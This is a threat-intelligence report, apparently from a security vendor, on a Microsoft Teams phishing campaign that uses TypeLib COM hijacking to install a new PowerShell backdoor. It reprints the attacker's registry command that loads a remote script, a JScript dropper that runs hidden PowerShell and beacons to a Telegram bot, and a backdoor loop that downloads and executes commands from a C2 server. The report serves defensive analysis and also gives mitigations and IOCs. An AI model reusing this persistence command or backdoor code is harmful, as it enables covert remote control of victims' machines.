In March 2025, while investigating multiple customer incidents, ReliaQuest uncovered an attack chain that began with familiar tactics but quickly escalated into a novel persistence method that involved hijacking the Component Object Model Type Library.
The attack also included the deployment of a malware we hadn’t encountered before. It targeted customers in the finance and professional, scientific, and technical services sectors.
Early tactics in the attack align with those of “Storm-1811” (aka “STAC5777”), a threat group known to deploy “Black Basta” ransomware. However, the later phases deviate from the norm, suggesting that the group may be evolving with new techniques or possibly splintering.
Attribution aside, the attack provided some key insights into threat actors’ evolving tactics that enterprises need to know. Read on to discover:
The adversary’s precise targeting patterns in their Microsoft Teams phishing attacks.
A never-before-seen TypeLib hijacking technique that installs the novel malware.
The unique behaviors of the new backdoor and insights into its development.
Key Points
ReliaQuest investigated a new Microsoft Teams phishing campaign using techniques previously deployed by Black Basta operators. However, the follow-on attack introduced entirely new methods, suggesting either evolution within the group or fragmentation among its members.
We identified a previously unreported persistence method leveraging TypeLib COM hijacking plus a new PowerShell backdoor, highlighting ongoing attacker efforts to evade detection and maintain access to compromised systems.
To defend against these tactics, organizations should restrict external communication in Microsoft Teams and harden Windows systems to prevent malicious execution.
Attack Lifecycle

Figure 1: Infection chain observed in the attacks we investigated
Precision Phishing: Exploiting Timing, Power, and Gender
The attacks kicked off with the adversary sending phishing messages to our customers’ employees via Microsoft Teams (see Figure 1). While we don’t know the contents of the messages, the attacker used the fraudulent Microsoft 365 tenant “techsupport[at]sma5smg.sch[.]id” with the display name “Technical Support” to pose as a member of IT staff. With this disguise, the recipients were almost certainly tricked into thinking IT support needed access to their system to fix a problem.
So far, so run-of-the-mill. We’ve seen these techniques used before by Storm-1811. In May 2024, the group posed as IT help staff in social engineering attacks. By October 2024, it shifted to phishing via Microsoft Teams, which bypassed traditional email security gateways and exploited employees’ trust in enterprise chat tools. This tactic became its go-to method. After gaining access, the group deployed remote monitoring and management (RMM) tools, which ultimately led to the Black Basta ransomware being used to extort organizations.
The Storm-1811 threat group specializes in conducting social engineering to gain initial access to facilitate the deployment of Black Basta ransomware. Black Basta handles the encryption and ransom demands, resulting in two distinct but complementary components of the attack chain.
However, these latest attacks had some features that indicated they were calculated strikes designed to exploit specific gaps:
Perfect Timing: The phishing chats were carefully timed, landing between 2:00 p.m. and 3:00 p.m., perfectly synced to the recipient organizations’ local time and coinciding with an afternoon slump in which employees may be less alert in spotting malicious activity.i
High-Value Targets: The attacker didn’t cast a wide net. They zeroed in on executive-level employees like directors and vice presidents—people who hold the power and access hackers crave but whose busy schedules may make them less vigilant.
Gender Stereotyping: Employees with female-sounding names were the exclusive targets, suggesting the attacker may have been banking on research into the demographics of phishing susceptibility to maximize their success rate.ii
Once the victim took the bait, the attacker manipulated the employee into launching a remote support session through Windows’ built-in “Quick Assist” tool. This approach reflects a broader trend we observed in 2024, where legitimate tools were used in 60% of hands-on-keyboard incidents. Leveraging Quick Assist as their gateway, the attacker employed an unusual persistence method that also launched the novel malware variant.
Hijacking TypeLib: New Persistence Method
Before we dive into the attacker’s unusual persistence technique, let’s define a few terms.
Term | Definition |
---|---|
Component Object Model (COM) | The Microsoft technology Component Object Model (COM) lets software components talk to each other and share programs’ functionalities. Think of it this way: Instead of developing a video decoder from scratch, a media player can use a prebuilt COM object, like the "mp4sdecd.dll" file, to display MP4 videos. COM references these objects using unique Class Identifiers (CLSID). For example, the CLSID "{2a11bae2-fe6e-4249-864b-9e9ed6e8dbc2}" points straight to that video decoder, making it easy for the media player to plug it in and get to work. |
COM hijacking | In COM hijacking, adversaries manipulate the Windows Registry by modifying a specific CLSID entry to redirect legitimate processes to malicious code. In the video decoder example, hackers could tamper with the registry entry tied to the CLSID {2a11bae2-fe6e-4249-864b-9e9ed6e8dbc2} so that it points to a malicious DLL instead of the real one. They can even configure the registry to reference external files hosted on URLs, making it even easier to load malicious scripts or payloads. The result? When a media player or any other application tries to load the COM object, it unknowingly runs the malicious DLL or external file instead. This isn’t just a one-time attack—it’s built for persistence, staying active even after system reboots. |
TypeLib hijacking | TypeLib, short for “Type Library,“ acts as a blueprint for COM objects—it holds metadata about their methods (e.g., “Play,” “Pause,” “Stop”) and interfaces, enabling applications to interact with them seamlessly. In TypeLib hijacking, attackers modify registry entries to redirect legitimate COM objects to malicious scripts or files. As a result, every time an application interacts with the hijacked COM object, the attacker’s code is executed instead. This technique is designed for persistence, ensuring the attacker’s foothold remains active whenever the application is used, all while leveraging legitimate system functionality for stealth. |
So how did the technique play out? Once the attacker gained control of the employee’s device, they used the following command to start the TypeLib hijacking process. We’ve annotated aspects of the command you should pay attention to:
reg add
1
""HKEY_CURRENT_USER\Software\Classes\TypeLib{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}
2
\1.1\0\win64"" /t REG_SZ /d "script:hxxps://drive.google[dot]com/uc?export=download^&id=1l5cMkpY9HIERae03tqqvEzCVASQKen63
3
" /f
This Windows Registry command (
reg add
) adds a new key-value pair or updates an existing one in the Windows Registry. It can alter system-level configurations or application-specific settings, depending on the registry path targeted.The command targets the TypeLib registry hive, which stores metadata about COM objects, including their CLSIDs. In this case, it’s referencing the CLSID {EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}, a key identifier tied to Internet Explorer components.
The command assigns a remote URL to the registry key's value, prefixed with the
script:
moniker. This COM-specific feature directs the system to load and execute scripts from the specified remote location, enabling the execution of malicious code.
The result of this command causes the malware hosted on the Google Drive URL to be downloaded and executed whenever the hijacked COM object is accessed—whether by opening Internet Explorer, an application utilizing Internet Explorer components, or a system process indirectly invoking the COM functionality. To make matters worse, the Windows process “Explorer.exe” would reference this COM object every time it runs (see Figure 2), meaning the malicious payload would be downloaded automatically on system restarts, ensuring the attacker’s code stayed active and persistent, with the system doing all the work.

Figure 2: Explorer.exe refencing the Internet Explorer COM object
We’ve seen security researchersiii demonstrate TypeLib hijacking as a practical proof of concept. We also observed threat actors discussing the technique on cybercriminal forums. For instance, in October 2024, a user shared the same article we’ve cited here on the prominent Russian-language cybercriminal forum XSS, with most replies expressing interest in the technique (see Figure 3). However, we hadn’t yet seen the technique play out in the wild until we observed the attacks analyzed here.

Figure 3: XSS users responding to TypeLib hijacking research
Breaking Down the New PowerShell Backdoor
After pulling off the TypeLib COM hijacking, a text file containing the malware (“5.txt”) from the Google Drive URL is downloaded. At the time of writing, the file has minimal malicious scoring on VirusTotal (see Figure 4), meaning it could slip right under the radar without triggering any alarms in defensive software that relies on signature-based detection, like an antivirus.

Figure 4: Backdoor result on VirusTotal, showing low malicious scoring
The malware in the text file was packed with extensive “junk code”—non-functional content designed to throw off detection tools and analysis. This word salad contained several space-themed keywords like “Galaxy,” “Cosmos,” and “Orion.” The functional portion of the text file employs a unique, layered scripting approach in which PowerShell is wrapped with JScript code.
Execution begins with JScript, which serves as the creator for the PowerShell backdoor. It writes the PowerShell code, contained in the same text file, to the path “C:\ProgramData\kcnxrx.ps1” using the command “WriteLine,” as seen in the code below.
<scriptlet>
<script language="JScript">
var extd = "s1"
var iiwjsp = "C:\\ProgramData\\kcnxrx.p" + extd;
var ljbvbg = gqvxvm.CreateTextFile(iiwjsp, true);
ljbvbg.WriteLine(<PowerShellCode>)
<---snippet----->
Once the PowerShell file is created, the JScript code executes the file in a hidden window not displayed to the user. The PowerShell also bypasses execution policies that block unauthorized or untrusted scripts, ensuring the malicious payload can run without restrictions.
Lastly, JScript code uses the “InstallProduct” method from the Windows Installer,iv which is intended to use MSI files to install programs. However, the code abuses this functionality to instead send an HTTP request to the attacker’s Telegram bot with a message (in this case, "qwe1bsrr5"). This is likely to inform the attacker that the script executed successfully, and that command-and-control (C2) is established.
<---snippet----->
ljbvbg.Close();
var djvatt = GetObject("winmgmts:\\\\.\\root\\cimv2:Win32_Process");
var hlrcuc = GetObject("winmgmts:\\\\.\\root\\cimv2:Win32_ProcessStartup");
var zpoqok = hlrcuc.SpawnInstance_();
zpoqok.ShowWindow = 0;
var kcbfwv = djvatt.Create('powershell.exe -ep bypass -file "' + iiwjsp + '"', null, zpoqok);
var skJJFkj = new ActiveXObject("windowsinstaller.installer");
skJJFkj.UILevel = 2;
skJJFkj.InstallProduct("https://api[.]telegram[.]org/bot7963974508
1
:
AAGyCacGCKKxa2fnWawtieZGtfg2VtKX5ps
2
/sendMessage?chat_id=7935143652
3
&text=qwe1bsrr5");
</script>
</scriptlet>
Bot Identifier: 7963974508
Access Token: AAGyCacGCKKxa2fnWawtieZGtfg2VtKX5ps
Chat ID: 7935143652
The PowerShell contained in the text file is obfuscated with junk code that has no functionality. Below, we’ve provided a cleaned and condensed version for ease of readability.
1.
$gurynf = New-Object -Com "Scripting.FileSystemObject"
$frtdtv = $gurynf.GetDrive("C:").SerialNumber
$frtdtv = "{0:X}" -f $frtdtv
$frtdtv = [convert]::toint64($frtdtv, 16)
$serial = $frtdtv
$giezyzk = 'htt'
$jikhdzg = 'p:/'
$dsjvpni = '/18'
$obhykml = '1.174'
$felumga = '.164.'
$ysapcoj = '180/'
$ip = $giezyzk + $jikhdzg + $dsjvpni + $obhykml + $felumga + $ysapcoj
$url = $ip + $serial
2.
$ryuuqj = New-Object Net.WebClient
3.
while ($true) {
try {
$pupcyw = $ryuuqj.DownloadString($url)
Invoke-Expression $pupcyw
} catch {
Start-Sleep -Seconds 5
continue
}
Start-Sleep -Seconds 5
}
4.
$tdnumg = New-Object Threading.Mutex($false, $frtdtv)
$tdnumg.WaitOne(1)
$tdnumg.ReleaseMutex()
$tdnumg.Dispose()Release and dispose of the mutex 40$tdnumg.ReleaseMutex() 41$tdnumg.Dispose()
When executed, the PowerShell performs the following actions:
Constructs the C2 beacon URL with the infected device’s hard drive serial number ($ip+$serial) and converts it to hexadecimal. This identifier is later referenced at the end of the C2 server URL ( “181[.]174[.]164[.]180/Serial_ID”).
Creates a WebClient object (Net.WebClient) for receiving commands or second-stage malware.
Runs an infinite loop to download and execute provided commands or malware.
Creates a Mutex derived from the infected system’s hard drive serial number to prevent the malware running multiple times and burning through system resources.
From Bing Ads to Backdoors: The Rise of a New Threat
We dug into the attacker’s infrastructure and reviewed the PowerShell code to identify any potential overlaps with known malware families. We found that the attacker has been developing versions of this malware since January 2025, deploying early versions via malicious Bing advertisements.
Telegram Bot Logs: We obtained a sample of the Telegram bot’s logs and uncovered some telling clues. Some logs included syntax written in Russian, like “<текст_отправляемого_сообщения>,” which translates to “<text_of_the_message_to_be_sent>.” This indicates the malware developer is highly likely located in a Russian-speaking country. The chat logs also contained messages communicating live updates to the attacker on successful infections. For example, one message contained the unique identifier “qwe1bsrr5” from the Telegram URL we referenced earlier, indicating successful C2 on that host. For each compromised host, the bot fired off messages like “qwe,” “qwe1,” and “qwe1calc”—totaling roughly 14 unique IDs and providing a peek into the digital trail of the attacker’s growing reach that signifies the effectiveness of the new malware.
Code Syntax: We conducted a search on VirusTotal for any malware that shares the same code syntax, such as “$ip+$serial.” We identified several versions, with the earliest being uploaded in January 2025, that had minimal functionality (see Figure 5). Some of the versions in February had the same features as the new malware we investigated but lacked obfuscation and had the C2 IP address of localhost (“$ip = hxxp://127.0.0[.]1”'), which is highly likely the adversary uploading early samples to check for malicious scoring on VirusTotal. This indicates that development and testing for the malware likely began in February 2025.

Figure 5: Early versions of the malware seen in VirusTotal.
These testing versions appear to have been uploaded by a single submitter in Latvia (see Figure 6). However, according to internal chat logs from the Black Basta operators leaked in February 2025, group members use VPNs and route traffic through Latvia. Although these upload records may not reflect the developer’s true location, they may be a sign of early detection testing by the author.

Figure 6: Early version of the malware uploaded to VirusTotal by user shown as located in Latvia
Family Ties: Some versions of the malware uploaded in January 2025 reference separate C2 servers from the active campaign (e.g., "5.252.153[.]15"). These versions have minimal functionality and obfuscation but share significant code overlap with the malware we were investigating, as seen in the PowerShell script “pas.ps1” below.
$fso = New-Object -Com "Scripting.FileSystemObject"
$SerialNumber = $fso.GetDrive("c:\").SerialNumber
$SerialNumber = "{0:X}" -f $SerialNumber
$SerialNumber = [convert]::toint64($SerialNumber,16)
$serial = $SerialNumber
$ip = 'http://5[.]252[.]153[.]15/'
$url = $ip+$serial
$s = New-Object System.Net.WebClient
while ($true) {
try {
$result=$s.DownloadString($url)
catch {
Start-Sleep -s 5
continue
Invoke-Expression $result
This infrastructure and associated PowerShell malware were previously used in a malicious Bing advertisement campaign, reported by security researchersv in January 2025. The Bing ads tricked users searching for Microsoft Teams software downloading and running a malicious sideloaded DLL (TV.dll) along with a PowerShell-based malware called "Boxter." Given their significant overlaps, it is almost certain that this new malware is an evolution of Boxter and was deployed by the same adversaries responsible for the malicious Bing ads campaign in early 2025. However, unlike the earlier campaign, the attacks used to deploy this new backdoor have no reported links to groups like Black Basta or Storm-1811. This indicates that it is realistically possible that a different group is responsible for the recent activity.
Key Takeaways and What’s Next
Because ReliaQuest detected and responded to every attack attempt before impact occurred, we were unable to discover the attackers' affiliate relationships and ultimate goals. But there are a few possible conclusions we can draw:
The Black Basta group adopted this new persistence method and malware for its attacks.
Operators of the Black Basta ransomware group have splintered, with those who specialized in Microsoft Teams phishing and phone call techniques now collaborating with a different group that employs the new methods described in this report.
An entirely different group has adopted the same initial access techniques that were previously used exclusively by Black Basta operators.
Whether or not this Microsoft Teams phishing campaign was run by Black Basta, it’s clear that phishing through Microsoft Teams isn’t going anywhere. Attackers keep finding clever ways to bypass defenses and stay inside organizations. This new malware highlights this ingenuity with its unique ability to be installed via TypeLib hijacking and to leverage multiple scripting languages for execution.
Step Up Your Defenses
Your Action Plan
Here’s how to protect your organization from this campaign and any other attacks that use similar tactics:
Disable external communication for Microsoft Teams to prevent phishing attacks targeting internal employees. If external communication is required, use a whitelist for trusted domains. Ensure chat creation events are being logged for Microsoft Teams to aid in detection and investigation.
Block “telegram[.]org” and “drive.google[.]com” at the network edge to prevent successful installation of the malware involved in these incidents and disrupt C2 communications.
Disable JScript via Group Policy or restrict it with AppLocker for departments and employees where it will not disrupt operations, such as at the executive level.
Set Windows Defender Application Control (WDAC) to the most restrictive level possible to enforce PowerShell's constrained language mode, limiting functions commonly exploited by malware.
Disable Windows Script Host (WSH) via Group Policy to prevent scripts from being executed with "wscript.exe" or "cscript.exe," blocking script-based malware that is downloaded and executed using the "script:" moniker. However, this change should be tested prior to deployment to ensure it does not disrupt software or processes that rely on Windows Script Host.
IOCs
Artifact | Details |
---|---|
181.174.164[.]180 | Malware C2 IP address |
130.195.221[.]182 98.158.100[.]22 | Microsoft Teams phishing IP addresses |
f74fac3e5f7ebb092668dc16a9542799ccacc55412cfc6750 d0f100b44eef898 | Malware hash |
techsupport[at]sma5smg.sch[.]id | Microsoft Teams phishing tenant |
181.174.164[.]107 181.174.164[.]140 181.174.164[.]2 181.174.164[.]240 181.174.164[.]4 181.174.164[.]41 181.174.164[.]47 | Additional identified C2 infrastructure |
5.252.153[.]15 5.252.153[.]241 | Malicious Bing ads C2 servers |
08b6bfc9a75a6bf94994936a4c3e6d6946a2437b31d8f6e8 841a52df76397237 ff707131ff8cb4779afa66addd6efce3ce165e115806570cc3 c2ed6df6be8de0 074124df8f60cef79577cad43a3adef39a4f773c2f4b5e33e 292992d410cc012 41c3c83a0b39d91d2c35398113788eabcad2de36138304c 812dce0282941b152 f74fac3e5f7ebb092668dc16a9542799ccacc55412cfc6750 d0f100b44eef898 ef9456ada1d93e7cfc1750be1afd68807d532b6e893edd5a d79f016affd29dd0 ecfcca6de9fb12c2989f0a46a235f3de2c7b6f0be0a4822af9 848ee21e3b541d 7ddbf961dfbb78daee07b04111b8dedf693bb8807406cd2c 442480c551d247e1 2df636a9ebdc6799d494151915656dc302deeade7e7ddca 2e2e414869777e740 62faba34d0439b74ec716e62eb990063f3a03a5516de397 6bfdd80cb0e39a76a 9c13fbdbc450474d4477c397497c9b40be7b89a1b4f9dfc5 7d764c7405301bb9 1821e33b7355d857fe3af5b67cb651260fa010a12d5ebd8d 30ad110b647b2e6b f560e95fd233a8441c5195a3864c78d9ef5d3b9033a383c5 55d7c1e3c30fca0a e68084a7eb869ef88cd61ec26537c7ca0433124cebfbd20a ebc8b4330952c653 b59e9d53ab73464e14d81f5a00e1c7580a99eed078a8dff4 48b926de3f0df0e6 bbd1afa9d0b142a0cc0ef7f1487eed512d538c79cd225e6c a9ca77e0a85f1f60 e7dd0d24a511cf8170840f8ebac3df3787ba3bfd97d136f4a 18a115700d137ff 3d0a09ba259d5f4b1e8d261fe05fef56b8611ba30edf46b7d 927f8f0808b9c53 6395a9b7be56159dc8d2fc2858b6f0fdcf63a1623ea426a4 9625195123f5166f 2b21d0a08fce188885520e610a68f06766729ea935631afc 843747f1cee387ab 291700be999ed8d361e9418a3375353c384999afc42271a ffa7ecc395f137fc0 ec513db1dcd045444fb7282f382786d91ed3357d254797af acec8b7bab1f5070 4dbd1bf6a07b97cb14cd4e2d78d09bc3561f225b64f99dc4 0774959e6bd9de21 7a0dea548c6cd0259ffb339865add2b739ab6441b1b5263 e3787120b8622d286 c09dffd32f233b9d65fe73432cfa29c1de9ea56cfd2f42b985 f5e0cccfc0aa4f 3c2c2d10650b98a7121c9d76e206fa1ffe81374e0594d226 c0bf56eb17423825 287e85989b76b8b395311575fc20cd18efa38571ccf94cec 2a3d3d0683862d79 7b89423831873906aa3f28507d1adbcca92b37dbb8a9be4 f2d753ebc31467f33 abfb7c3c3ea828bf85874c596cac17770668abb28734cbee c67dc8c958afd340 3448da03808f24568e6181011f8521c0713ea6160efd05bff 20c43b091ff59f7 | Additional identified malware hashes based on “$ip+$serial” syntax |
i hxxps://hoxhunt[.]com/blog/top-3-phishing-attack-factors-time-desktop-mobile
ii hxxps://lorrie.cranor[.]org/pubs/pap1162-sheng.pdf
iii hxxps://cicada-8[.]medium[.]com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661
iv hxxps://learn.microsoft[.]com/en-us/windows/win32/msi/downloading-an-installation-from-the-internet
v hxxps://cybersecuritynews[.]com/fake-microsoft-teams-page-drops-malware-on-windows/
Hayden Evans is the primary author of this report.